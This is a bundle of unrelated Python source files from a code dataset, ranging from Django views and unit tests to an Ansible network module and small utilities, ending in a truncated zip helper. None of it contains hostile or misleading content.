(str,)}): [optional] # noqa: E501\n name (str): [optional] # noqa: E501\n object (str): [optional] # noqa: E501\n recipient (str): [optional] # noqa: E501\n status (str): [optional] # noqa: E501\n three_d_secure (three_d_secure.ThreeDSecure): [optional] # noqa: E501\n tokenization_method (str): [optional] # noqa: E501\n type (str): [optional] # noqa: E501\n \"\"\"\n\n self._data_store = {}\n self._check_type = _check_type\n self._from_server = _from_server\n self._path_to_item = _path_to_item\n self._configuration = _configuration\n\n for var_name, var_value in six.iteritems(kwargs):\n if (\n var_name not in self.attribute_map\n and self._configuration is not None\n and self._configuration.discard_unknown_keys\n and self.additional_properties_type is None\n ):\n # discard variable.\n continue\n setattr(self, var_name, var_value)\n","sub_path":"python/onshape_client/oas/models/card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":9994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"405846960","text":"#!/usr/bin/python\n\nimport logging\nimport sys\n\nlog = logging.getLogger('root')\nlog.setLevel(logging.DEBUG)\n\nstream = logging.StreamHandler(sys.stdout)\nstream.setLevel(logging.DEBUG)\n\nformatter = logging.Formatter('[%(asctime)s] %(levelname)8s %(module)15s: %(message)s')\nstream.setFormatter(formatter)\n\nlog.addHandler(stream)\n\n\nimport time\nimport datetime\nimport threading\nimport Clock\nimport Alarm\n\n\nclass AlarmPi:\n def __init__(self):\n self.stopping = False\n\n def stop(self):\n self.stopping = True\n\n def execute(self):\n log.info(\"Preparing something\")\n log.debug(\"Loading Alarm\")\n alarm = Alarm.Alarm()\n alarm.setDaemon(True)\n\n log.debug(\"Loading Clock\")\n clock = Clock.Clock()\n clock.setDaemon(True)\n clock.start()\n alarm.start()\n\n\n # Main loop till KeyboardInterrupt.\n try:\n while(self.stopping is False):\n time.sleep(1)\n except (KeyboardInterrupt, SystemExit):\n log.warn(\"Interrupted!, shutting down\")\n\n log.warn(\"Shutting down\")\n # +Shutdown sound\n time.sleep(2)\n\n log.info(\"Stopping all services\")\n clock.stop()\n alarm.stop()\n\n log.info(\"Shutdown complete, now exiting\")\n\n time.sleep(2) # To give threads time to shut down\n\nalarm = AlarmPi()\nalarm.execute()\n# Start up the AlarmPi class.","sub_path":"alarmpi.py","file_name":"alarmpi.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"541002197","text":"\nfrom sys import exit\nfrom os import path\nfrom json import loads, dumps\nfrom time import time\nfrom datetime import datetime\n\ndef readin(filename):\n '''reads json'''\n try:\n ffapi = str()\n if path.exists(filename):\n ffapi = filename\n elif path.exists(path.join(path.abspath(path.dirname(__file__)), filename)):\n ffapi = path.join(path.abspath(path.dirname(__file__)), filename)\n else:\n raise Exception('json file not found')\n\n with open(ffapi, 'r') as fn:\n return loads(fn.read())\n\n except Exception as ex:\n exit(ex)\n\ndef writeout(filename, content):\n '''writes json'''\n try:\n with open(filename, 'w') as fn:\n return fn.write(dumps(content, indent=4))\n except Exception as ex:\n exit(ex)\n\ndef tstamp(short=False):\n '''get timestamp'''\n if short:\n return int(time())\n return datetime.now().isoformat('T')\n\nclass Loader(object):\n '''replace existing fields'''\n def __init__(self, filename):\n super(Loader, self).__init__()\n self.filename = filename\n self.ffapi = readin(self.filename)\n\n def dump(self, overwrite=False):\n '''writes ffapi'''\n if self.ffapi:\n filename = self.filename if overwrite else self.filename.replace('.json', '_change.json')\n self.set(['state', 'lastchange'], tstamp(short=False))\n return writeout(filename, self.ffapi)\n\n def get(self):\n '''get ffapi'''\n return self.ffapi\n\n def find(self, fields):\n '''finds fields'''\n scope = self.ffapi\n for field in fields:\n if field in scope.keys():\n if field == fields[-1]:\n return scope[field]\n scope = scope[field]\n\n def set(self, fields, value):\n '''sets fields'''\n scope = self.ffapi\n for field in fields:\n if field in scope.keys():\n if field == fields[-1]:\n scope[field] = value\n scope = scope[field] # Pointerfun with Blinky!\n\nif __name__ == '__main__':\n loader = Loader('ffapi_file.json')\n\n print('name => %s\\n' %(loader.find(['name'])))\n print('location,city => %s\\n' %(loader.find(['location', 'city'])))\n\n loader.set(['api'], '1.2.3')\n\n loader.dump(overwrite=False)\n\n","sub_path":"changeffapi.py","file_name":"changeffapi.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"447070940","text":"import seaborn as sns\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams\n\n\nrcParams.update({'figure.autolayout': True})\n\n# forget_colors = ['darkorchid', 'mediumspringgreen', 'midnightblue']\n\ndef make_layered_lineplot(arraylist, condlist, target, colorlist, phase):\n fig, ax = plt.subplots()\n for array, color, cond in zip(arraylist, colorlist, condlist):\n line=sns.lineplot(data = array, x=array.index, y=target, ax=ax,\n label=cond, color=color)\n ax.legend()\n ax.set_xlabel('Time (ms)')\n ax.set_ylabel('Proportion of Viewing')\n line=line.get_figure()\n line.savefig('figs/line' + target + phase + '.png')\n plt.clf()\n","sub_path":"domcue/make_domcue_figs.py","file_name":"make_domcue_figs.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"324916163","text":"import unittest\nimport xlrd\nfrom ddt import ddt\nfrom ddt import data\nfrom ddt import unpack\nfrom Calc import Calc\n\ndef getvalue(file,sheetnub):\n\n rd = xlrd.open_workbook(filename=file,encoding_override=True)\n sheet = rd.sheet_by_index(sheetnub)\n\n rows = sheet.nrows\n cols = sheet.ncols\n\n f = []\n for i in range(rows):\n f.append(sheet.row_values(i))\n\n return f\n\n\n\nf1 = getvalue(\"测试数据.xls\",0)\nf2 = getvalue(\"测试数据.xls\",1)\nf3 = getvalue(\"测试数据.xls\",2)\nf4 = getvalue(\"测试数据.xls\",3)\n\n@ddt\nclass TestExcle(unittest.TestCase):\n\n @data(*f1)\n @unpack\n def test_Add(self,a,b,c):\n calc = Calc()\n sum = calc.add(a,b)\n self.assertEqual(c,sum)\n\n @data(*f2)\n @unpack\n def test_Reduce(self,a,b,c):\n calc = Calc()\n sum = calc.reduce(a,b)\n self.assertEqual(c, sum)\n\n @data(*f3)\n @unpack\n def test_Multi(self,a,b,c):\n calc = Calc()\n sum = calc.multi(a,b)\n self.assertEqual(c, sum)\n\n @data(*f4)\n @unpack\n def test_Division(self,a,b,c):\n calc = Calc()\n sum = calc.division(a,b)\n self.assertEqual(c, sum)\n","sub_path":"day17/TestCalc.py","file_name":"TestCalc.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"24530990","text":"from rest_framework.permissions import (\n SAFE_METHODS,\n AllowAny,\n BasePermission,\n IsAdminUser,\n)\n\n\nclass PermissionMixin:\n def get_permissions(self):\n permission_classes = []\n\n if self.action in (\"list\", \"retrieve\"):\n permission_classes = [AllowAny]\n\n if self.action in (\"create\", \"destroy\", \"update\", \"partial_update\"):\n permission_classes = [IsAdminUser]\n\n return [permission() for permission in permission_classes]\n\n\nclass IsAuthorOrStaff(BasePermission):\n \"\"\"\n Доступ для автора, модератора или администратора.\n \"\"\"\n\n def has_object_permission(self, request, view, obj):\n\n return (\n request.method in SAFE_METHODS\n or request.user.role in [\"admin\", \"moderator\"]\n or obj.author == request.user\n )\n","sub_path":"api/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"91925711","text":"'''\n题目:有n个整数,使其前面各数顺序向后移m个位置,\n 最后m个数变成最前面的m个数\n'''\na = [i for i in range(1,20,2)]\ndef move_item(n):\n for j in range(n):\n temp = a.pop()\n a.insert(0,temp)\n print(a)\n\nif __name__ == '__main__':\n print(\"The original list is:\\n\",a)\n num = int(input(\"Num(1-9):\"))\n move_item(num)\n","sub_path":"python100例/37_列表项移动.py","file_name":"37_列表项移动.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"462094784","text":"import argparse\r\nimport time\r\nimport os\r\nfrom dao import save, load\r\nfrom writer import random_text, flatten\r\nfrom reader import process_file\r\n\r\ndef main(run_test=False, new_data=False, n=500):\r\n\tsuffix_maps = ''\r\n\tif new_data:\r\n\t\tprint(\"Refreshing Data.\")\r\n\t\tfor db in ['narration.dat', 'narration.dir', 'narration.bak', 'dialog.dat', 'dialog.dir', 'dialog.bak']:\r\n\t\t\tif os.path.exists(db):\r\n\t\t\t\tos.remove(db)\r\n\t\tfor filename, encoding in ({'alp.txt': None, 'tsg.txt':'utf8', 'llf.txt':'utf8', 'hhc.txt':'utf8'}.items()):\r\n\t\t\tsuffix_maps = process_file(filename, encoding)\r\n\t\tif not run_test:\r\n\t\t\tsave(suffix_maps)\r\n\r\n\ttime_0 = time.time()\r\n\tprint(\"Loading data...\")\r\n\tif not run_test:\r\n\t\tsuffix_maps = load()\r\n\ttime_1 = time.time()\r\n\tprint(\"Data loaded! Time:\" + str(time_1 - time_0))\r\n\tnarration = random_text(suffix_maps[0], n)\r\n\ttime_2 = time.time()\r\n\tprint(\"Narration created! Time:\" + str(time_2 - time_1))\r\n\tdialog = random_text(suffix_maps[1], n)\r\n\ttime_3 = time.time()\r\n\tprint(\"Dialog created! Time:\" + str(time_3 - time_2))\r\n\ttext = flatten(narration, dialog, n)\r\n\ttime_4 = time.time()\r\n\tprint(\"Text flattened! Time:\" + str(time_4 - time_3))\r\n\tprint(\"##################################################################\")\r\n\tprint(text)\r\n\r\n# python .\\main.py --new_data\r\nif __name__ == '__main__':\r\n\tparser = argparse.ArgumentParser()\r\n\tparser.add_argument(\"-R\", \"--run_test\", help=\"test mode\", action=\"store_true\")\r\n\tparser.add_argument(\"-D\", \"--new_data\", help=\"replace databases from files\", action=\"store_true\")\r\n\tparser.add_argument(\"-n\", \"--num_chars\", type=int, help=\"num of characters to write\")\r\n\targs = parser.parse_args()\r\n\tkwargs={'run_test': args.run_test, 'new_data': args.new_data}\r\n\tif args.num_chars:\r\n\t\tkwargs['n'] = args.num_chars\r\n\tmain(**kwargs)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"451008586","text":"from Graph import dag\n\n\ndef dag_sssp(g):\n g.restore(1)\n rst = g.topological_sort()\n for i in rst:\n for j in range(len(g.edge)):\n if g.edge[i][j] is not None:\n g.relax(i, j)\n return g.d\n\n\nif __name__ == '__main__':\n print(dag_sssp(dag))\n","sub_path":"algorithm/24/a24.2.py","file_name":"a24.2.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"292513753","text":"from page.page_in import PageIn\nfrom tools.get_driver import GetDriver\nfrom tools.get_log import GetLog\nfrom tools.read_yaml import readyaml\n\nlog = GetLog.get_logger()\nrd =readyaml(\"mp_login.yaml\")[0]\n\nclass TestAppLogin():\n def setup_class(self):\n # 初始化\n driver = GetDriver.get_app_driver()\n # 获取统一入口类\n self.pagein = PageIn(driver)\n # 获取PageAppLogin对象\n self.app_login = self.pagein.page_get_PageAppLogin()\n # 结束\n\n def teardown_class(self):\n GetDriver.quit_app_driver()\n # 测试方法\n\n def test_app_login(self, username=rd[0], pwd=rd[1]):\n self.app_login.page_app_login(username, pwd)\n\n # 断言\n try:\n assert self.app_login.page_get_nickname()\n\n except Exception as e:\n # 截图\n self.app_login.base_get_screenshot()\n # 日志\n log.error(e)\n # 抛异常\n raise\n","sub_path":"scripts/test05_app_login.py","file_name":"test05_app_login.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"363268499","text":"#!/usr/bin/python\n\"\"\" PN CLI vrouter-packet-relay-add/remove \"\"\"\n\n# Copyright 2018 Pluribus Networks\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport shlex\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.pn_nvos import pn_cli\n\nDOCUMENTATION = \"\"\"\n---\nmodule: pn_vrouter_packet_relay\nauthor: \"Pluribus Networks (devops@pluribusnetworks.com)\"\nversion: 2\nshort_description: CLI command to add/remove vrouter-packet-relay.\ndescription:\n - C(add): add packet relay configuration for DHCP on vrouter\n - C(remove): remove packet relay configuration for DHCP on vrouter\noptions:\n pn_cliswitch:\n description:\n - Target switch to run the CLI on.\n required: False\n type: str\n pn_action:\n description:\n - vrouter-packet-relay configuration command.\n required: true\n choices: ['add', 'remove']\n type: str\n pn_forward_ip:\n description:\n - forwarding IP address\n required: false\n type: str\n pn_nic:\n description:\n - NIC\n required: false\n type: str\n pn_forward_proto:\n description:\n - protocol type to forward packets\n required: false\n type: str\n pn_vrouter_name:\n description:\n - name of service config\n required: false\n type: str\n\"\"\"\n\nEXAMPLES = \"\"\"\n- name: add vrouter packet relay\n pn_vrouter_packet_relay:\n pn_action: 'add'\n pn_vrouter_name: 'spine-vrouter'\n pn_forward_ip: '172.16.1.1'\n pn_forward_proto: 'dhcp'\n pn_nic: 'eth0'\n\n- name: remove vrouter packet relay\n pn_vrouter_packet_relay:\n pn_action: 'remove'\n pn_vrouter_name: 'spine-vrouter'\n pn_forward_ip: '172.16.1.1'\n pn_forward_proto: 'dhcp'\n pn_nic: 'eth0'\n\"\"\"\n\nRETURN = \"\"\"\ncommand:\n description: the CLI command run on the target node.\nstdout:\n description: set of responses from the vrouter-packet-relay command.\n returned: always\n type: list\nstderr:\n description: set of error responses from the vrouter-packet-relay command.\n returned: on error\n type: list\nchanged:\n description: indicates whether the CLI caused changes on the target.\n returned: always\n type: bool\n\"\"\"\n\n\ndef run_cli(module, cli):\n \"\"\"\n This method executes the cli command on the target node(s) and returns the\n output. The module then exits based on the output.\n :param cli: the complete cli string to be executed on the target node(s).\n :param module: The Ansible module to fetch command\n \"\"\"\n action = module.params['pn_action']\n cli = shlex.split(cli)\n rc, out, err = module.run_command(cli)\n\n # Response in JSON format\n if err:\n module.fail_json(\n command=' '.join(cli),\n stderr=err.strip(),\n msg=\"vrouter-packet-relay %s operation failed\" % action,\n changed=False\n )\n\n if out:\n module.exit_json(\n command=' '.join(cli),\n stdout=out.strip(),\n msg=\"vrouter-packet-relay %s operation completed\" % action,\n changed=True\n )\n\n else:\n module.exit_json(\n command=' '.join(cli),\n msg=\"vrouter-packet-relay %s operation completed\" % action,\n changed=True\n )\n\n\ndef main():\n \"\"\" This section is for arguments parsing \"\"\"\n module = AnsibleModule(\n argument_spec=dict(\n pn_cliswitch=dict(required=False, type='str'),\n pn_action=dict(required=True, type='str',\n choices=['add', 'remove']),\n pn_forward_ip=dict(required=False, type='str'),\n pn_nic=dict(required=False, type='str'),\n pn_forward_proto=dict(required=False, type='str'),\n pn_vrouter_name=dict(required=False, type='str'),\n )\n )\n\n # Accessing the arguments\n action = module.params['pn_action']\n forward_ip = module.params['pn_forward_ip']\n nic = module.params['pn_nic']\n forward_proto = module.params['pn_forward_proto']\n vrouter_name = module.params['pn_vrouter_name']\n\n # Building the CLI command string\n cli = pn_cli(module)\n cli += 'vrouter-packet-relay-' + action\n\n if forward_ip:\n cli += ' forward-ip ' + forward_ip\n if nic:\n cli += ' nic ' + nic\n if forward_proto:\n cli += ' forward-proto ' + forward_proto\n if vrouter_name:\n cli += ' vrouter-name ' + vrouter_name\n \n run_cli(module, cli)\n\nif __name__ == '__main__':\n main()\n","sub_path":"ansible/modules/pn_vrouter_packet_relay.py","file_name":"pn_vrouter_packet_relay.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"545432696","text":"from django.shortcuts import render\nfrom django.views.generic import View, TemplateView\nfrom django.http import QueryDict\nfrom django.http import HttpResponse\nimport datetime\n\nfrom .models import TblCategory\n\n\nclass CategoriesView(TemplateView):\n http_method_names = ['get', 'post', 'put', 'delete']\n template_name = 'category_app/index.html'\n\n def get(self, request, *args, **kwargs):\n categories = TblCategory.objects.filter(category_name__contains='').order_by('category_name')\n return render(request, self.template_name, {'categories': categories})\n\n def post(self, request, *args, **kwargs): \n new_category = TblCategory(int(request.POST['category_id']), request.POST['category_name'])\n new_category.save()\n return self.get(request, self.template_name)\n\n def delete(self, request, *args, **kwargs):\n params = QueryDict(request.body)\n # import pdb\n # pdb.set_trace()\n category_id = int(params.get('category_id'))\n category_name = params.get('category_name')\n selected_category = TblCategory.objects.get(category_id=category_id)\n selected_category.delete()\n categories = TblCategory.objects.filter(category_name__contains='').order_by('category_name')\n return render(request, self.template_name, {'categories': categories})\n\n def put(self, request, *args, **kwargs):\n params = QueryDict(request.body)\n category_id = params.get('category_id')\n category_name = params.get('category_name')\n selected_category = TblCategory.objects.get(category_id=category_id)\n selected_category.category_name = category_name\n # import pdb\n # pdb.set_trace()\n return self.get(request, self.template_name)\n","sub_path":"webcrud/category_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"558399779","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 19 11:47:42 2019\n\n@author: jbuisine\n\"\"\"\n\n# main imports\nimport sys, os, argparse\nimport numpy as np\nimport random\n\n# images processing imports\nfrom PIL import Image\nfrom ipfml.processing.segmentation import divide_in_blocks\n\n# modules imports\nsys.path.insert(0, '') # trick to enable import of main folder module\n\nimport custom_config as cfg\nfrom modules.utils import data as dt\nfrom modules.classes.Transformation import Transformation\n\n# getting configuration information\nzone_folder = cfg.zone_folder\nlearned_folder = cfg.learned_zones_folder\nmin_max_filename = cfg.min_max_filename_extension\n\n# define all scenes values\nscenes_list = cfg.scenes_names\nscenes_indices = cfg.scenes_indices\ndataset_path = cfg.dataset_path\nzones = cfg.zones_indices\nseuil_expe_filename = cfg.seuil_expe_filename\n\nfeatures_choices = cfg.features_choices_labels\noutput_data_folder = cfg.output_datasets\n\ngeneric_output_file_svd = '_random.csv'\n\ndef generate_data_model(_filename, _transformations, _dataset_folder, _selected_zones):\n\n output_train_filename = os.path.join(output_data_folder, _filename, _filename + \".train\")\n output_test_filename = os.path.join(output_data_folder, _filename, _filename + \".test\")\n\n # create path if not exists\n if not os.path.exists(os.path.join(output_data_folder, _filename)):\n os.makedirs(os.path.join(output_data_folder, _filename))\n\n train_file_data = []\n test_file_data = []\n\n # specific number of zones (zones indices)\n zones = np.arange(16)\n\n # go ahead each scenes\n for folder_scene in _selected_zones:\n\n scene_path = os.path.join(_dataset_folder, folder_scene)\n\n train_zones = _selected_zones[folder_scene]\n\n for id_zone, index_folder in enumerate(zones):\n\n index_str = str(index_folder)\n if len(index_str) < 2:\n index_str = \"0\" + index_str\n \n current_zone_folder = \"zone\" + index_str\n zone_path = os.path.join(scene_path, current_zone_folder)\n\n # custom path for interval of reconstruction and metric\n\n features_path = []\n\n for transformation in _transformations:\n \n # check if it's a static content and create augmented images if necessary\n if transformation.getName() == 'static':\n \n # {sceneName}/zoneXX/static\n static_metric_path = os.path.join(zone_path, transformation.getName())\n\n # img.png\n image_name = transformation.getParam().split('/')[-1]\n\n # {sceneName}/zoneXX/static/img\n image_prefix_name = image_name.replace('.png', '')\n image_folder_path = os.path.join(static_metric_path, image_prefix_name)\n \n if not os.path.exists(image_folder_path):\n os.makedirs(image_folder_path)\n\n features_path.append(image_folder_path)\n\n # get image path to manage\n # {sceneName}/static/img.png\n transform_image_path = os.path.join(scene_path, transformation.getName(), image_name) \n static_transform_image = Image.open(transform_image_path)\n\n static_transform_image_block = divide_in_blocks(static_transform_image, cfg.sub_image_size)[id_zone]\n\n dt.augmented_data_image(static_transform_image_block, image_folder_path, image_prefix_name)\n\n else:\n metric_interval_path = os.path.join(zone_path, transformation.getTransformationPath())\n features_path.append(metric_interval_path)\n\n # as labels are same for each metric\n for label in os.listdir(features_path[0]):\n\n label_features_path = []\n\n for path in features_path:\n label_path = os.path.join(path, label)\n label_features_path.append(label_path)\n\n # getting images list for each metric\n features_images_list = []\n \n for index_metric, label_path in enumerate(label_features_path):\n\n if _transformations[index_metric].getName() == 'static':\n # by default append nothing..\n features_images_list.append([])\n else:\n images = sorted(os.listdir(label_path))\n features_images_list.append(images)\n\n # construct each line using all images path of each\n for index_image in range(0, len(features_images_list[0])):\n \n images_path = []\n\n # get information about rotation and flip from first transformation (need to be a not static transformation)\n current_post_fix = features_images_list[0][index_image].split(cfg.post_image_name_separator)[-1]\n\n # getting images with same index and hence name for each metric (transformation)\n for index_metric in range(0, len(features_path)):\n\n # custom behavior for static transformation (need to check specific image)\n if _transformations[index_metric].getName() == 'static':\n # add static path with selecting correct data augmented image\n image_name = _transformations[index_metric].getParam().split('/')[-1].replace('.png', '')\n img_path = os.path.join(features_path[index_metric], image_name + cfg.post_image_name_separator + current_post_fix)\n images_path.append(img_path)\n else:\n img_path = features_images_list[index_metric][index_image]\n images_path.append(os.path.join(label_features_path[index_metric], img_path))\n\n if label == cfg.noisy_folder:\n line = '1;'\n else:\n line = '0;'\n\n # compute line information with all images paths\n for id_path, img_path in enumerate(images_path):\n if id_path < len(images_path) - 1:\n line = line + img_path + '::'\n else:\n line = line + img_path\n \n line = line + '\\n'\n\n if id_zone in train_zones:\n train_file_data.append(line)\n else:\n test_file_data.append(line)\n\n train_file = open(output_train_filename, 'w')\n test_file = open(output_test_filename, 'w')\n\n random.shuffle(train_file_data)\n random.shuffle(test_file_data)\n\n for line in train_file_data:\n train_file.write(line)\n\n for line in test_file_data:\n test_file.write(line)\n\n train_file.close()\n test_file.close()\n\ndef main():\n\n parser = argparse.ArgumentParser(description=\"Compute specific dataset for model using of metric\")\n\n parser.add_argument('--output', type=str, help='output file name desired (.train and .test)')\n parser.add_argument('--features', type=str,\n help=\"list of features choice in order to compute data\",\n default='svd_reconstruction, ipca_reconstruction',\n required=True)\n parser.add_argument('--folder', type=str,\n help='folder where generated data are available',\n required=True) \n parser.add_argument('--params', type=str, \n help=\"list of specific param for each metric choice (See README.md for further information in 3D mode)\", \n default='100, 200 :: 50, 25',\n required=True)\n parser.add_argument('--size', type=str, \n help=\"Size of input images\",\n default=\"100, 100\")\n parser.add_argument('--selected_zones', type=str, help='file which contains all selected zones of scene', required=True) \n\n args = parser.parse_args()\n\n p_filename = args.output\n p_folder = args.folder\n p_features = list(map(str.strip, args.features.split(',')))\n p_params = list(map(str.strip, args.params.split('::')))\n p_size = args.size # not necessary to split here\n p_selected_zones = args.selected_zones\n\n selected_zones = {}\n with(open(p_selected_zones, 'r')) as f:\n\n for line in f.readlines():\n\n data = line.split(';')\n del data[-1]\n scene_name = data[0]\n thresholds = data[1:]\n\n selected_zones[scene_name] = [ int(t) for t in thresholds ]\n\n # create list of Transformation\n transformations = []\n\n for id, feature in enumerate(p_features):\n\n if feature not in features_choices:\n raise ValueError(\"Unknown metric, please select a correct metric : \", features_choices)\n\n transformations.append(Transformation(feature, p_params[id], p_size))\n\n if transformations[0].getName() == 'static':\n raise ValueError(\"The first transformation in list cannot be static\")\n\n\n # create database using img folder (generate first time only)\n generate_data_model(p_filename, transformations, p_folder, selected_zones)\n\nif __name__== \"__main__\":\n main()\n","sub_path":"generate/generate_dataset_file.py","file_name":"generate_dataset_file.py","file_ext":"py","file_size_in_byte":9757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"400005273","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom django.contrib import messages\nfrom apps.LOGIN_APP.models import Users, Company\nimport random, datetime, bcrypt\n\n#LOGIN_APP_VIEWS\n#LOGIN_APP_VIEWS\n#LOGIN_APP_VIEWS\n\n#BEGIN_LOGIN_PAGE_ROUTES\n#BEGIN_LOGIN_PAGE_ROUTES\n#BEGIN_LOGIN_PAGE_ROUTES\ndef index(request): #MAIN INDEX IE LOGIN INDEX\n return render(request,'LOGIN_APP/index.html')\n\ndef processRegistration(request): #REGISTRATION PROCESS ROUTE\n errors = Users.objects.validator(request.POST)\n if len(errors) > 0:\n for key, val in errors.items():\n messages.error(request, val)\n return redirect('/')\n else:\n newUserPass = request.POST['password']\n newUserPassEncrypt = bcrypt.hashpw(newUserPass.encode(), bcrypt.gensalt())\n\n newUser = Users.objects.create(\n fname= request.POST['fname'],\n lname= request.POST['lname'],\n username= request.POST['username'],\n birthday= request.POST['birthday'],\n email= request.POST['email'],\n password= newUserPassEncrypt\n )\n request.session['user_live'] = newUser.id\n return redirect('/attic')\n\ndef processLogin(request): #LOGIN PROCESS ROUTE \n errors = Users.objects.loginVal(request.POST)\n if len(errors) > 0:\n for key, val in errors.items():\n messages.error(request, val)\n return redirect('/')\n\n userQuery = Users.objects.get(email= request.POST['email'])\n request.session['user_live'] = userQuery.id\n return redirect('/attic' )\n\n#END_LOGIN_PAGE_ROUTES\n#END_LOGIN_PAGE_ROUTES\n#BEGIN_SUCCESS_PAGE_ROUTES\n#BEGIN_SUCCESS_PAGE_ROUTES\n\ndef success(request): #RENDER SUCCESS, TO INFORM THE USER THAT THEY ARE IN SESSION\n try:\n liveUser = request.session['user_live']\n context ={\n 'user': Users.objects.get(id = liveUser),\n }\n return render(request, 'LOGIN_APP/success.html', context)\n except:\n messages.error(request, 'Must be logged in first')\n return redirect('/')\n\ndef logout(request): #CLEAR USER IN SESSION\n request.session.clear()\n return redirect('/')\n\n#END_SUCCESS_PAGE_ROUTES\n#END_SUCCESS_PAGE_ROUTES\n#BEGIN USER RELATED FUNCTIONS\n#BEGIN USER RELATED FUNCTIONS\n#BEGIN USER RELATED FUNCTIONS\n\ndef userPage(request, userID): #FOR RENDERING A USERS PAGE\n sessionUser = request.session['user_live']\n context = {\n 'thisUser': Users.objects.get(id= userID),\n 'sessionUser': Users.objects.get(id=sessionUser),\n\n }\n\n return render(request, \"LOGIN_APP/userPage.html\", context)\n\n\n#COMPANY STUFF\n#COMPANY STUFF\n#COMPANY STUFF\n#COMPANY STUFF\n\ndef companyPage(request, companyID): #FOR RENDERING A COMPANY PAGE\n try:\n liveUser = request.session['user_live']\n context = {\n 'thisCompany': Company.objects.get(id= companyID),\n 'liveUser': Users.objects.get(id=liveUser),\n }\n\n return render(request, \"LOGIN_APP/companyPage.html\", context)\n except:\n messages.error(request, 'Must be logged in first/BROKE AT COMPANY PAGE')\n return redirect('/')\n\ndef addEmployee(request):#ADDING EMPLOYEES\n newEmployee = request.POST['empname']\n newEmployee = Users.objects.get(username=newEmployee)\n thisCompany = request.POST['thisCompany']\n thisCompany = Company.objects.get(id=thisCompany)\n thisCompany.employee.add(newEmployee)\n thisCompany.save()\n return redirect('/company%s' %(thisCompany.id))\n \n\ndef companyRegForm(request, userID):#COMPANY REGISTRATION FORM\n context = {\n 'thisUser': Users.objects.get(id= userID),\n\n }\n\n return render(request, \"LOGIN_APP/companyForm.html\", context)\n\n\ndef processRegistrationCompany(request, userID): #COMPANY REGISTRATION PROCESS ROUTE\n errors = Company.objects.sessionVal(request.POST)\n if len(errors) > 1:\n for key, val in errors.items():\n messages.error(request, val)\n return redirect('/')\n else:\n\n newCompany = Company.objects.create(\n name= request.POST['name'],\n description= request.POST['description'],\n administrator= Users.objects.get(id=userID),\n )\n return redirect('/user%s' %(userID))\n\n#LOGIN_APP_VIEWS\n#LOGIN_APP_VIEWS\n#LOGIN_APP_VIEWS\n#LOGIN_APP_VIEWS","sub_path":"apps/LOGIN_APP/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"312679535","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build\\bdist.win-amd64\\egg\\cloud_training\\utils.py\n# Compiled at: 2017-10-29 21:52:06\n# Size of source mod 2**32: 2402 bytes\nimport logging, os, zipfile, errno\n\ndef data_dir(path: str=''):\n \"\"\"Returns an absolute path to \"data\" directory.\n\n Args:\n path: A path which should be added to the \"data\" path.\n\n \"\"\"\n res_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'data')\n if path:\n res_path = os.path.join(res_path, path)\n return res_path\n\n\ndef zip_dir(path: str):\n \"\"\"Zips non-zip files recursively one by one.\n\n Note:\n \"Unzip\" script is located in the \"unzip.py\" file to be transferred to a remote machine.\n\n Args:\n path: The directory in which the files should be zipped.\n\n \"\"\"\n zip_files_list = []\n for root, dirs, filenames in os.walk(path):\n for filename in filenames:\n _, ext = os.path.splitext(filename)\n if ext == '.zip':\n pass\n else:\n file_path = os.path.join(root, filename)\n zip_file_path = file_path + '.zip'\n if os.path.exists(zip_file_path):\n pass\n else:\n zip_files_list.append((file_path, filename, zip_file_path))\n\n if not zip_files_list:\n logging.debug('No files to zip')\n return\n logging.debug('Zipping files...')\n for file_path, filename, zip_file_path in zip_files_list:\n logging.debug('File: ' + file_path)\n zip_file = 